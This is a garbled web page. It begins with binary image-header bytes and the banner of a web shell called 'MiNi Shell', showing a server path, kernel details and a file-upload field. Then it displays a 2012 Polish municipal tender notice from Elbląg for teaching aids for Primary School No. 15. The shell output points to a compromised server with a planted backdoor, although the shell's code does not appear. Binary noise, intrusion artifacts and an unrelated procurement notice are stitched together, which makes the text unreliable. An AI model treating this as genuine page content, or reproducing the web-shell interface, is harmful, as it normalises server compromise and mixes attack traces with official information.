JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120608/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120608/126255-N-2012.html

<p class="kh_header"><b>Elbląg: Dostawa pomocy dydaktycznych do Szkoły Podstawowej nr 15 w ramach realizacji projektu systemowego Indywidualnie znaczy lepiej-wsparcie dla procesu nauczania początkowego w klasach I-III w elbląskich szkołach podstawowych i specjalnych ośrodkach szkolno-wychowawczych</b><br>
<b>Numer ogłoszenia: 126255 - 2012; data zamieszczenia: 08.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina - Miasto Elbląg , ul. Łączności 1, 82-300 Elbląg, woj. warmińsko-mazurskie, tel. 55 235 35 36, 55 239 31 25, faks 55 239 33 34.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.umelblag.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa pomocy dydaktycznych do Szkoły Podstawowej nr 15 w ramach realizacji projektu systemowego Indywidualnie znaczy lepiej-wsparcie dla procesu nauczania początkowego w klasach I-III w elbląskich szkołach podstawowych i specjalnych ośrodkach szkolno-wychowawczych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest:
	
Dostawa pomocy dydaktycznych do Szkoły Podstawowej nr 15 w ramach realizacji projektu systemowego Indywidualnie znaczy lepiej-wsparcie dla procesu nauczania początkowego w klasach I-III w elbląskich szkołach podstawowych i specjalnych ośrodkach szkolno-wychowawczych.

Przedmiot główny:
CPV:	39.16.21.00 - 6
Nazewnictwo wg CPV: Pomoce dydaktyczne

Projekt systemowy finansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego w ramach Priorytetu IX Rozwój wykształcenia i kompetencji w regionach, Działania 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty Poddziałania 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych Programu Operacyjnego Kapitał Ludzki.

Miejsce dostawy: Szkoła Podstawowa nr 15 Im. Armii Krajowej ul. Modlińska 45

2.	Przedmiot i zakres zamówienia obejmuje dostawę niżej wymienionych pomocy dydaktycznych:
1. Nazwa rodzaju zajęć dodatkowych: Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji.
1.1	 Radioodtwarzacz CD : z 2 głośnikami o średnicy 10 cm. moc wyjściowa to 2 x 1 W. Wyposażony jest w złącze USB	Ilość:	1 zest.
1.2.	Program multimedialny  do czytania i pisania, ćwiczeń utrwalających znajomość pisowni, doskonalących czytanie	Ilość:	5 szt.
1.3	Zagadki z rozwiązaniami w formie obrazków na kartonikach typu alfabet zgadywanka	Ilość:	5  szt.
1.4	Pakiet zdjęć do ćwiczeń językowych ( różne części mowy: rzeczowniki, czasowniki i przymiotniki)	Ilość:	5 szt. w 1 zest.
1.5	Magnesy	Ilość:	10 kpl. po 10-15szt.
1.6	Pomoc edukacyjna w formie kart  lub pieczątek edukacyjnych  typu cykl życia	Ilość:	10 zestawów
1.7	Pusy- układanki do układania obrazka wg wzoru np. Pinokio, Piotruś Pan, Zegar-kalendarz	Ilość:	10 różnych
1.8	Mikrofon MP3	Ilość:	1 szt.
1.9	Pacynki  np. Czerwony Kapturek, Trzy świnki	Ilość:	3 zestawy po min. 3 elementy
1.10	Gra edukacyjna polegająca na wyszukiwaniu obrazków; gra w grupach - losowanie kartonika i wyszukiwanie go na planszy np. Bystre oczko - 7gier	Ilość:	3 zestawy składające się z 7 gier
1.11	Plansza  (tablica ) magnetyczna  z figurkami, z których można stworzyć obraz o różnorodnej tematyce.	Ilość:	3  zest. z min. 100 elementami magnetycznymi
1.12	Suwaki sylabowe do czytania o różnym kształcie: tarcze, windy, które mają ruchome sylaby do ułożenia ich w konkretny wyraz	Ilość:12 zest. z ok. 20-30 elem.
1.13	Wskaźnik z okienkiem ułatwiającym czytanie do wykorzystania przy tablicy	Ilość:	5 szt. 
1.14	Woreczki  edukacyjne w pięciu kolorach z półeczką.	Ilość:	 8 zest.
1.15	Gra zręcznościowa polegająca na umieszczaniu elementów o różnych kształtach na płatkach kwiatka np. typu Swingolo lub równoważna gra zręcznościowa	Ilość:	5szt.
1.16	Pary obrazków przedstawiających przedmioty, ludzi itp. o przeciwnych cechach np. cienki-gruby, lekki-ciężki	Ilość:	5 zestawów 
1.17	Zabawka magnetyczna w formie klocków konstrukcyjnych, krążków itp.  które przyciągając się tworzą kolorowe konstrukcje 	Ilość:	5 szt.
1.18	Domino z obrazkami 	Ilość:	-rozwija spostrzegawczość doskonali czytanie i liczenie
1.19	Puzzle do układania o tematyce środowiskowej np. natura itp.	Ilość:	2  zest. z min. 20 elementami
1.20	Książki dla dzieci z trudnościami w czytaniu zawierające ćwiczenia do bezpośredniej pracy z uczniem np. kolorowanki, zagadki, rymowanki itp.	Ilość:	10 szt.
1.21	Gry dydaktyczne o różnorodnej tematyce np. o zwierzętach, roślinach, dokonywaniu zakupów, biznes,, tworzeniu wyrazów np.  typu Scrabble   	Ilość:	8szt.
1.22	Puzzle przedstawiające postaci zwierząt	Ilość:	10  zest. z min.  36 elementami
1.23	Pomoc dydaktyczna ucząca ortografii, np. w formie domina lub innej równoważnej	Ilość:	10  zest.
1.24	Gry planszowe-logiczne, ekonomiczne, przyrodnicze np. typu Miesiące i pory roku, Monopoly City	Ilość:	10 szt. (po 5 szt. jednego rodzaju)
1.25	Zbiór liter (alfabet) 

	Ilość:	10 kpl. 
2. Nazwa rodzaju zajęć dydaktycznych: Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych
2.1	Gra dydaktyczna z elementami liczenia w zakresie 4 działań, planowania, rozwiązywania zadań itp. np. typu Wyścig, Skaczące czapeczki 	Ilość:	7 szt.
2.2	Gra dydaktyczna o dokonywaniu zakupów przy pomocy pieniędzy dla  min. 2-4 osób	Ilość:	3 szt.
2.3	Klocki  do liczenia	Ilość:	5 zestawów
2.4	Domino z liczbami i działaniami matematycznymi, figurami geometrycznymi, innymi obrazkami ( 5 rodzajów)	Ilość:	5 szt.
2.5	Puzzle podłogowe z figurami geometrycznymi i znakami matematycznymi oraz innymi obrazami typu Puzzelator	Ilość:	2  zest.
2.6	Magnesy do przyczepiania na tablicę magnetyczną w różnych kolorach - mogą mieć formę figur matem.	Ilość:	8 zestawów
2.7	Farby do malowania palcami w różnych kolorach w dużych pojemnikach	Ilość:	 6 zestawów po min. 6 rodzajów farb
2.8	Gry ruchowe z różnym stopniem trudności np. gra w klasy, balansowanie, gry zręcznościowe	Ilość:	Zestaw 21 gier (po 3 każdego rodzaju)
2.9	Kalambury-naśladuję np. dźwięki i pokazuję	Ilość:	10zestawów po np. 120 kart
2.10	Układanki -pusy np. W świecie zwierząt, Gutek i Balbina, Królewna Śnieżka	Ilość:	10 różnych
2.11	Wielokąty - figury geometryczne ruchome (mozaika kolorowa) do manipulowania nimi	Ilość:	5 zestawów z min. 250 figurami
2.12	Gra edukacyjna polegająca na wyszukiwaniu obrazków; gra w grupach - losowanie kartonika i wyszukiwanie go na planszy np. typu  Bystre oczko - 7gier	Ilość:	3 zestawy 
2.13	Tablica magnetyczna przygotowująca do pisania  - duża _  markery w min. 8 kolorach (suchościeralne) i magnetycznymi kuleczkami w min. 10 kolorach.	Ilość:	2  kpl.
2.14	Wskaźnik z okienkiem ułatwiający wyizolowanie liczb, sylab lub pomoc równoważna	Ilość:	5 szt.
2.15	Woreczki  z kształtami matematycznymi
(elementy obrazujące liczby od 1 do 10)	Ilość:	6 szt.
2.16	Kołatki plastikowe lub drewniana  - urządzenie do wydawania określonego dźwięku poprzez obracanie elementu obrotowego	Ilość:	6  szt.
2.17	Gra edukacyjna polegająca na rozwiązywaniu zadań - zest.  ponumerowanych elementów połączonych za pomocą magnesów  
	Ilość:	5 szt
2.18	Klocki kolorowe do liczenia i układania o różnych długościach	Ilość:	10 zestawów 
2.19	Pary obrazków przedstawiające np. przedmioty, ludzi, zwierzęta o przeciwnych cechach np. cienka-gruba	Ilość:	5 zestawów 
2.20	Programy multimedialne-matematyczne gry edukacyjne do ćwiczeń w dodawaniu, odejmowaniu, przedstawianiu liczb na osi liczbowej, tworzeniu, rozwiązywaniu zadań tekstowych itp.	Ilość:	6 szt.
2.21	Waga umożliwiająca ważenie materiałów sypkich, płynnych i stałych do 1l.	Ilość:	5 szt.
2.22	Książki dla dzieci z trudnościami w liczeniu, czytaniu zawierające ćwiczenia do bezpośredniej pracy z uczniem np. kolorowanki, zagadki, rymowanki itp.	Ilość:	9 szt. ( 3 szt x3 rodzaje)
2.23	Zegar magnetyczny-różne rodzaje zegarów do nauki czasu (z magnesem) i pór roku	Ilość:	5 różnych zegarów
2.24	Gry edukacyjne-liczenie, zadania matematyczne, przestrzenne	Ilość:	5 szt. różnych gier
2.25	Klocki typu Lego do układania różnych budowli dla chłopców i dziewczynek	Ilość:	4 zestawy z min. 300 klockami
2.26	Zestaw  5 różnych zegarów do pomiaru czasu, temperatury, wilgotności powietrza, faz księżyca	Ilość:	5 różnych zegarów
2.27	Liczmany magnetyczne-obrazki przedstawiające zwierzęta, owoce, narzędzia, ludzi itp. z przeznaczeniem na tablicę szkolną	Ilość:	1 zest.
3. Nazwa rodzaju zajęć dodatkowych: Gimnastyka korekcyjna dla dzieci z wadami postawy
3.1	Piłki lekarskie  
1. waga 1000 g. 
2.  waga 2000 g 	Ilość:	1. 8 szt. 
2. 5 szt. 
3.2	Zestaw drążków i obręczy gimnastycznych	Ilość:	2 zestawy wymienione
3.3	Piłki  skacząca z uchwytami	Ilość:	8 szt. 
3.4	Zestaw  do gry w hokeja	Ilość:	5 szt.
3.5	Materace gimnastyczne -dół materaca antypoślizgowy, pokryty PCV, wypełniony pianką wysokoplastyczną, ścianki mają siatkę wentylacyjną	Ilość:	10 szt.
3.6	Karimata lub mata wielowarstwowa
	Ilość:	9 szt.
4. Nazwa rodzaju zajęć dodatkowych: Zajęcia rozwijające zainteresowania uczniów wybitnie szczególnie uzdolnionych Bystre oko i tęgie głowy ze szczególnym uwzględnieniem nauk matematyczno-przyrodniczych
4.1	Puzzle matematyczne- różne działania,  gra matematyczna, składająca się z wielu elementów 	Ilość:	10szt
4.2	 Składane bryły geometryczne składane, w kilku elementach do złożenia w jedną bryłę: sześcian, stożek itp.	Ilość:	12szt.
4.3	Bryły geometryczne -zestaw z tworzywa	Ilość:	4 zestawy 
4.4	 Zestaw klocków matematycznych  dających dużo możliwości łączenia ich ze sobą.	Ilość:	6 zest.
4.5	Puzzle matematyczne  w formie sześcianów	Ilość:	10 szt. 
4.6	 Tablica edukacyjna, magnetyczna	Ilość:	6 szt.
4.7	Historyjki obrazkowe, opowiadające o tym  jak troszczyć się o planetę; oszczędzać wodę, energię 
	Ilość:	5 zestawów z min.6historyjkami z 
4.8	Gra ekologiczna związana ze środowiskiem typu Mały Ekolog	Ilość:	6 szt.
4.9	Kalendarz przyrodniczy przedstawiający zmieniającą się pogodę w ciągu całego roku	Ilość:	 1 zest. 
4.10	Stacja pogody- przyrząd służący do określania stanu pogody	Ilość:	9 szt.
4.11	Model ruchomy Układu Słonecznego na baterie: planety, gwiazdozbiory, słońce	Ilość:	3szt
4.12	Globus z mapą fizyczną,, podświetlany	Ilość:	3 szt.
4.13	 Zestaw puzzli  dot. zagadnień ekologicznych 
	Ilość:	3  zest.
4.14	Szachy z drewna z obciążonymi figurami	Ilość:	4 szt.
4.15	Zestaw modeli brył  objętości
	Ilość:	6 zest.
4.16	 Model szkieletu	Ilość:	 12 zest. 
4.17	Puzzle  duże przedstawiające przyrodę: rośliny i zwierzęta	Ilość:	4  zest.
4.18	Tangram  typu Tangalo	Ilość:	1 komplet
4.19	Tangram  - pomoc dydaktyczna, tradycyjna chińska układanka	Ilość:	1 szt.
4.20	Karty zadaniowe do pracy do liczydła 	Ilość:	12 serii.
4.21	Układanka dydaktyczna-domino , typu Mały Ekolog 
	Ilość:	Zestaw z min. 40  elementami
4.22	Pomoc dydaktyczna-zeszyt, książka, układanka, loteryjka itp. ukazująca życie przyrodnicze w wodzie, na polu, w lesie, w domu, pod ziemią itp.	Ilość:	22 szt. w 1 zest.
4.23	Preparat mikroskopowy zwierający tkanki roślinne i zwierzęce	Ilość:	Zestaw  z min. 10 szkiełkami
4.25	Różne  grupy pokarmów ułożonych w piramidę pokarmową lub zdrowego żywienia	Ilość:	6 zest.
4.26	Książki tematyczne- przyrodnicze, matematyczne  z zadaniami, zagadkami, łamigłówkami matematycznymi; do bezpośredniej pracy z uczniem jako ćwiczenia	Ilość:	20 szt.
4.27	Liczmany magnetyczne- zest.	Ilość:	6 zestawów
4.28	Mikroskop  z kamerą  i szkiełkami 	Ilość:	8 szt.
5. Nazwa rodzaju zajęć dodatkowych: Zajęcia  wokalno - muzyczne rozwijające zainteresowania uczniów szczególnie uzdolnionych
5.1	Instrumenty muzyczne komplet z tamburynem i dzwonkami	Ilość:	5 zestawów
5.2	Płyty CD	Ilość:	15 szt.
5.3	Instrumenty muzyczne- zest. podstawowy	Ilość:	5 zestawów
5.3	Głośnik -MC-10 kolumna głośnikowa 125W 8ohm	Ilość:	2 szt.
5.5	Wzmacniacz gitarowy, model BA20 30W	Ilość:	1 szt.
5.6	Statyw mikrofonowy-stojak z teleskopowym ramieniem do przytrzymywania mikrofonu	Ilość:	2 szt.
5.7	Stroje sceniczne - koszulki z nadrukiem Piętnastka i nutkami w kolorze czerwonym, jasnozielonym, błękitnym	Ilość:	12 szt.
5.8	Pompony sceniczne na rękę w kilku kolorach	Ilość:	24 szt.
5.9	Instrumenty muzyczne komplet z tamburynem i marakasami	Ilość:	8 zestawów
5.10	Książki tematyczne - scenariusze przedstawień teatralnych, scenariusze uroczystości szkolnych w szkole podstawowej (kilka różnych), śpiewniki z  piosenkami biesiadnymi, żołnierskimi, patriotycznymi, okazjonalnymi, itd.	Ilość:	20 szt.
5.11	Mikrofon z wyjściem USB	Ilość:	2 szt.
5.12	Gitara z akcesoriami - typu  tranglewood DBT 44; gitara C-30; pokrowiec GK-1-3/4, pokrowiec  XG 2223H; podnóżki K.M 1467-00055, pulpity do nut KM 100/1	Ilość:	2 szt.
6. Nazwa rodzaju zajęć dodatkowych: Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych: polonistyczne koło żywego słowa
6.1	Tablice (plansze)  demonstracyjne z literami od A do Ż,; zestaw liter z tablicami do demonstracji	Ilość:	5 zestawów 
6.2	Gry edukacyjne- układanie wyrazów np. typu scrabble, bierki, płytki  do wytłaczania, nożyczki do wycinania wzorków, pieczątki do wycinania ozdobnych elementów i inne	Ilość:	10 szt.
6.3	Puzzle z obrazkami o tematyce polonistycznej, historycznej, geograficznej	Ilość:	8  zestawów od 100 do 1000 elementów
6.4	Zest. słowników wyrazów obcych, bliskoznacznych itp.	Ilość:	20 szt.

Zamawiający informuje, że w FORMULARZU CENOWYM - Szczegółowy wykaz pomocy dydaktycznych do realizacji zajęć dodatkowych - Dostawa pomocy dydaktycznych na zajęcia dodatkowe w Szkole Podstawowej nr 15 stanowiącym ZAŁĄCZNIK NR 4 do SIWZ podano informacje w zakresie: Rodzaju przedmiotu, Materiału, Wymiarów, Ilości oraz Przeznaczenia.

3.	Wykonawca zobowiązuje się do dostarczenia fabrycznie nowego przedmiotu zamówienia.

4.	Wykonawca dostarczy przedmiot zamówienia spełniający warunki określone dla produktów bezpiecznych w rozumieniu art. 4 ustawy z dnia 12 grudnia 2003 r. o ogólnym bezpieczeństwie produktów (Dz.U. z 2003 r.,  Nr 229, poz. 2275 z późn. zm.) i nadający się do wykorzystania przez Zamawiającego, zgodnie z przeznaczeniem określonym w SIWZ.
Produkty zakwalifikowane jako zabawki zgodnie z Rozporządzeniem Ministra Gospodarki z dnia 05 kwietnia 2011 r. w sprawie zasadniczych wymagań dla zabawek (Dz.U. z 2011r., Nr 83, poz. 454) muszą być oznaczone znakiem CE i posiadać Deklarację zgodności WE wystawioną przez producenta.

5.	W pozycjach opisanych poprzez wskazania znaku towarowego patentu lub pochodzenia dopuszcza się składanie ofert równoważnych o parametrach technicznych i wymogach jakościowych nie niższych niż przedmioty wskazane przez Zamawiającego.

6.	Zamawiający informuje, że zgodnie z ustawą Prawo zamówień publicznych Wykonawca, który złoży ofertę zawierającą rozwiązania równoważne do opisanych przez Zamawiającego, jest zobowiązany wykazać, że oferowane przez niego przedmioty spełniają wymagania określone przez Zamawiającego.
Zamawiający wymaga, aby Wykonawca w ZAŁĄCZNIKU NR 4 do SIWZ - FORMULARZ CENOWY - Szczegółowy wykaz pomocy dydaktycznych do realizacji zajęć dodatkowych - Dostawa pomocy dydaktycznych na zajęcia dodatkowe w Szkole Podstawowej nr 15 wskazał i opisał przedmiot, który oferuje Zamawiającemu jako równoważny do opisanego przez Zamawiającego.
Zamawiający wymaga, aby Wykonawca opisując przedmiot, który oferuje jako równoważny do opisanego przez Zamawiającego wskazał parametry oferowanego przedmiotu w zakresie wszystkich parametrów (Rodzaj przedmiotu, Materiał, Wymiary, Przeznaczenie) wymienionych przez Zamawiającego w FORMULARZU CENOWYM - Szczegółowy wykaz pomocy dydaktycznych do realizacji zajęć dodatkowych - Dostawa pomocy dydaktycznych na zajęcia dodatkowe w Szkole Podstawowej nr 15, stanowiącym ZAŁĄCZNIK NR 4 do SIWZ.
Zamawiający oceniając, czy podane przez Wykonawcę przedmioty są równoważne będzie porównywał parametry (Rodzaj przedmiotu, Materiał, Wymiary, Przeznaczenie) opisane w FORMULARZU CENOWYM - Szczegółowy wykaz pomocy dydaktycznych do realizacji zajęć dodatkowych - Dostawa pomocy dydaktycznych na zajęcia dodatkowe w Szkole Podstawowej nr 15 przez Zamawiającego i wskazane przez Wykonawcę.

7.	Dostawa pomocy dydaktycznych będzie zrealizowana w oparciu finansowane działanie w ramach projektu systemowego: Indywidualizacja procesu nauczania i wychowania uczniów klas I-III szkół podstawowych tzw. Standard IV: 1. Posiadane pomieszczenia dydaktyczne dla klas I-III, szkoła może doposażyć zgodnie z założeniami nowej podstawy programowej kształcenia ogólnego na I etapie edukacyjnym oraz z zasadami indywidualizacji procesu nauczania i wychowania. Szkoła doposaża swoją bazę dydaktyczną w pomoce dydaktyczne wynikające z procesu indywidualizacji oraz w sprzęt specjalistyczny (np.: specjalistyczne oprogramowanie, pakiety do diagnozowania i korygowania dysfunkcji i dysharmonii rozwojowych, takich jak: wady wymowy, dysleksja, wady postawy, zaburzenia koordynacji ruchowej). Planowane elementy doposażenia szkoły odpowiadają rozpoznanym potrzebom i zaplanowanym zajęciom dodatkowym.

8.	Zamawiający wymaga udzielenia minimum 12 miesięcy gwarancji na przedmiot zamówienia od dnia dostarczenia przedmiotu zamówienia do wskazanej przez Zamawiającego placówki oświatowej.

9.	Zamawiający nie zastrzega w SIWZ, że część lub całość zamówienia nie może być powierzona podwykonawcom. Zamawiający żąda wskazania przez Wykonawcę w ofercie części zamówienia, której wykonanie powierzy podwykonawcom.

10.	Zamawiający informuje, że nie przewiduje udzielenia zamówień uzupełniających.

11.	Zamawiający informuje, że nie przewiduje udzielania zaliczek na poczet wykonania zamówienia.

12.	Zamawiający przewiduje możliwość unieważnienia postępowania o udzielenie zamówienia, jeżeli środki pochodzące z budżetu Unii Europejskiej, które Zamawiający zamierzał przeznaczyć na sfinansowanie części zamówienia, nie zostaną Zamawiającemu przyznane..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 14.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzenia spełniania tego warunku Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzenia spełniania tego warunku Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzenia spełniania tego warunku Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzenia spełniania tego warunku Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzenia spełniania tego warunku Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

